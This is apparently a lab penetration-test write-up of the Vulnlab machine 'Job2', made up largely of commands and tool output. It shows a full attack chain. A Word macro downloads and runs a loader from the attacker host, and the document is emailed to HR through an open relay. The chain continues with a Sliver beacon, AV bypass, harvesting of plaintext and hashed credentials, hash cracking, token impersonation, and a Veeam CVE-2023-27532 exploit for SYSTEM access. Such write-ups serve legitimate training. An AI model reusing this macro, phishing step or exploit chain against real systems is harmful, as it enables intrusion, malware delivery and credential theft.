Job2
Machine information
Operating System: Windows 2016
Chain: False (standalone compromise)
Credentials
Username
Password
Method
Scope
Mailserver Administrator
MailAdm1n2023
hMailServer
95C02068FD5D
Decrypt hash
Database for hMailServer
Ferdinand
Franzi123!
Extracted from Database
Local User
✅ Valid Usernames
Ferdinand🔑 Passwords list
MailAdm1n2023
95C02068FD5D
Franzi123!Information Gathering
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
1063/tcp open rpcbind syn-ack ttl 127
2049/tcp open rpcbind syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal ServicesService enumeration
SMTP
The service is vulnerable to Open Relay, which means any unauthenticated user can send emails through it
❯ nmap -p25 -Pn --script smtp-open-relay 10.10.95.231
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 15:34 EDT
Nmap scan report for 10.10.95.231
Host is up (0.16s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)HTTPS (www.job2.vl)
Possible Attack Path: If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document. We look forward to hearing from you!
Initial Access
During the assessment, the tester configured a Sliver server and generated a beacon named http-vulnlabs-4444.exe for use throughout the assessment.
Setting up Macro for MS Word
It was discovered AV Engine running into the system blocking everything. The tester proceeded to use Bypass AV/EDR via DInvoke + Sliver to bypass and obtain a reverse shell.
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
ByVal lpCmdLine As String, _
ByVal uCmdShow As Long) As Long
Sub AutoOpen()
URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End Sub
Sending the malicious file via sendemail tool
❯ sendemail -t hr@job2.vl -f john.smith@gmail.com -a pay.doc -u "Subject: Appliction Resume" -s 10.10.89.165 -v
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
May 06 18:25:35 kali sendemail[185144]: Message input complete.
May 06 18:25:35 kali sendemail[185144]: DEBUG => Connecting to 10.10.89.165:25
May 06 18:25:35 kali sendemail[185144]: DEBUG => My IP address is: 10.8.5.48
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 220 JOB2 ESMTP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: EHLO kali
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250-JOB2, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: MAIL FROM:<john.smith@gmail.com>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: RCPT TO:<hr@job2.vl>
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 250 OK
May 06 18:25:36 kali sendemail[185144]: INFO => Sending: DATA
May 06 18:25:36 kali sendemail[185144]: SUCCESS => Received: 354 OK, send.
May 06 18:25:36 kali sendemail[185144]: INFO => Sending message body
May 06 18:25:36 kali sendemail[185144]: Setting content-type: text/plain
May 06 18:25:36 kali sendemail[185144]: DEBUG => Sending the attachment [pay.doc]
May 06 18:25:38 kali sendemail[185144]: SUCCESS => Received: 250 Queued (1.484 seconds)
May 06 18:25:38 kali sendemail[185144]: Email was sent successfully! From: <john.smith@gmail.com> To: <hr@job2.vl> Subject: [Subject: Appliction Resume] Attachment(s): [pay.doc] Server: [10.10.89.165:25]
Lateral movement to Ferdinand
Performing Situational Awarness
sliver (http-vulnlabs-4444) > sa-whoami
[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:
UserName SID
====================== ====================================
JOB2\Julian S-1-5-21-3935782767-3829597994-1046841959-1000
GROUP INFORMATION Type SID Attributes
================================================= ===================== ============================================= ==================================================
JOB2\None Group S-1-5-21-3935782767-3829597994-1046841959-513 Mandatory group, Enabled by default, Enabled group,
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group,
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,
Privilege Name Description State
============================= ================================================= ===========================
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
sliver (http-vulnlabs-4444) > Enumerating the security solutions
sliver (http-vulnlabs-4444) > execute -o cmd "/c powershell Get-MPComputerStatus | findstr True"
[*] Output:
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : True
IoavProtectionEnabled : True
IsVirtualMachine : True
NISEnabled : True
OnAccessProtectionEnabled : True
QuickScanOverdue : True
RealTimeProtectionEnabled : True
sliver (http-vulnlabs-4444) >
Discovering an unusual installed software
sliver (http-vulnlabs-4444) > ls
C:\Progra~2 (25 items, 174 B)
=============================
drwxrwxrwx AWS SDK for .NET <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx AWS Tools <dir> Wed Apr 12 03:24:57 +0000 2023
drwxrwxrwx Common Files <dir> Wed May 03 18:47:14 +0000 2023
-rw-rw-rw- desktop.ini 174 B Sat May 08 08:18:31 +0000 2021
drwxrwxrwx hMailServer <dir> Wed May 03 13:48:57 +0000 2023
drwxrwxrwx Internet Explorer <dir> Wed Dec 15 04:19:46 +0000 2021
drwxrwxrwx LINQPad5 <dir> Wed May 03 14:05:02 +0000 2023
drwxrwxrwx Microsoft <dir> Thu Aug 19 06:41:12 +0000 2021
drwxrwxrwx Microsoft Office <dir> Wed May 03 15:15:38 +0000 2023
drwxrwxrwx Microsoft OneDrive <dir> Tue May 02 21:20:00 +0000 2023
drwxrwxrwx Microsoft SQL Server <dir> Wed May 03 18:15:45 +0000 2023
drwxrwxrwx Microsoft SQL Server Compact Edition <dir> Wed May 03 14:08:26 +0000 2023
drwxrwxrwx Microsoft Synchronization Services <dir> Wed May 03 13:49:01 +0000 2023
drwxrwxrwx Microsoft Visual Studio 14.0 <dir> Wed May 03 18:11:58 +0000 2023
drwxrwxrwx Microsoft.NET <dir> Wed May 03 18:15:54 +0000 2023
drwxrwxrwx MSBuild <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Reference Assemblies <dir> Wed May 03 13:43:58 +0000 2023
drwxrwxrwx Veeam <dir> Wed May 03 18:47:42 +0000 2023
drwxrwxrwx Windows Defender <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Mail <dir> Wed Mar 15 06:46:55 +0000 2023
drwxrwxrwx Windows Media Player <dir> Wed Jul 13 08:03:39 +0000 2022
drwxrwxrwx Windows NT <dir> Sat May 08 09:35:34 +0000 2021
drwxrwxrwx Windows Photo Viewer <dir> Thu Feb 10 00:28:44 +0000 2022
drwxrwxrwx Windows Sidebar <dir> Sat May 08 08:34:49 +0000 2021
drwxrwxrwx WindowsPowerShell <dir> Sat May 08 08:34:49 +0000 2021
sliver (http-vulnlabs-4444) > LINQPad 5is a powerful software utility specifically designed for .NET Framework 4.6 development, allowing developers to interactively query SQL databases and write C# code without needing a full IDE.hMailServeris a free, open source, e-mail server for Microsoft Windows. It's used by Internet service providers, companies, governments, schools and enthusiasts in all parts of the world.Veeamis a software company specializing in data protection, backup, and disaster recovery solutions for various workloads, including virtual, physical, cloud-based, and SaaS environments
Discovering a credentials in Julian's Desktop
sliver (http-vulnlabs-4444) > ls
C:\Users\Julian\Desktop (3 items, 2.8 KiB)
==========================================
-r--r--r-- creds.txt 39 B Wed May 03 15:38:10 +0000 2023
-rw-rw-rw- desktop.ini 282 B Wed May 03 16:28:26 +0000 2023
-rw-rw-rw- Word 2016.lnk 2.5 KiB Thu May 04 10:43:29 +0000 2023
sliver (http-vulnlabs-4444) > cat creds.txt
Mailserver Administrator: MailAdm1n2023Credentials found: Mailserver Administrator: MailAdm1n2023
Obtaining the hMailServer configuration file
sliver (http-vulnlabs-4444) > cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
sliver (http-vulnlabs-4444) >
Hash found: 4e9989caf04eaa5ef87fd1f853f08b62
Downloading Database file
sliver (http-vulnlabs-4444) > download hMailServer.sdf
[*] Wrote 675840 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/hMailServer.sdfDecrypting database password
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/hmailserver_password.exe
[*] Wrote file to C:\Temp\hmailserver_password.exe
sliver (http-vulnlabs-4444) > execute -o hmailserver_password.exe dec 4e9989caf04eaa5ef87fd1f853f08b62
[*] Output:
95C02068FD5D
sliver (http-vulnlabs-4444) >
Password: 95C02068FD5D
Extracting user's hashes from Database
Software: LINQPad5Setup.exe
Dependencies: Microsoft SQL Server Compact 3.5
How to open SDF files: https://stackoverflow.com/questions/2375118/how-to-open-sdf-files
Bruteforcing and obtaining Ferdinand's Password
❯ hashid 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
Analyzing '04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11'
[+] hMailServer
❯ hashcat -m 1421 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11:Franzi123!Ferdinand@job2.vl: Franzi123!
Privilege Escalation to NT Authority Syste
Lateral movement to Ferdinand user
sliver (http-vulnlabs-4444) > make-token --username Ferdinand -p 'Franzi123!' -T LOGON_NETWORK
[*] Successfully impersonated \Ferdinand. Use `rev2self` to revert to your previous token.
sliver (http-vulnlabs-4444) > whoami
Logon ID: JOB2\Julian
[*] Current Token ID: JOB2\Ferdinand
sliver (http-vulnlabs-4444) > Obtaining the vulnerable Veeam version
Exploit: CVE-2023-27532
sliver (http-vulnlabs-4444) > execute -o cmd '/c powershell Get-Package | findstr Veeam'
[*] Output:
Veeam Backup & Replication 10.0.1.4854Uploading the exploit and dependencies.
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/VeeamHax.exe
[*] Wrote file to C:\Temp\VeeamHax.exe
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Interaction.MountService.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Interaction.MountService.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Model.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Model.dll
sliver (http-vulnlabs-4444) > upload /home/Intrusionz3r0/Documents/Vulnlabs/Job2/Content/Veeam.Backup.Common.dll
[*] Wrote file to C:\Temp\Veeam.Backup.Common.dllExploit vulnerability to obtain a shell as NT Authority System
sliver (http-vulnlabs-4444) > execute VeeamHax.exe --target 127.0.0.1 --cmd "C:\Windows\system32\spool\drivers\color\Loader.exe"
Last updated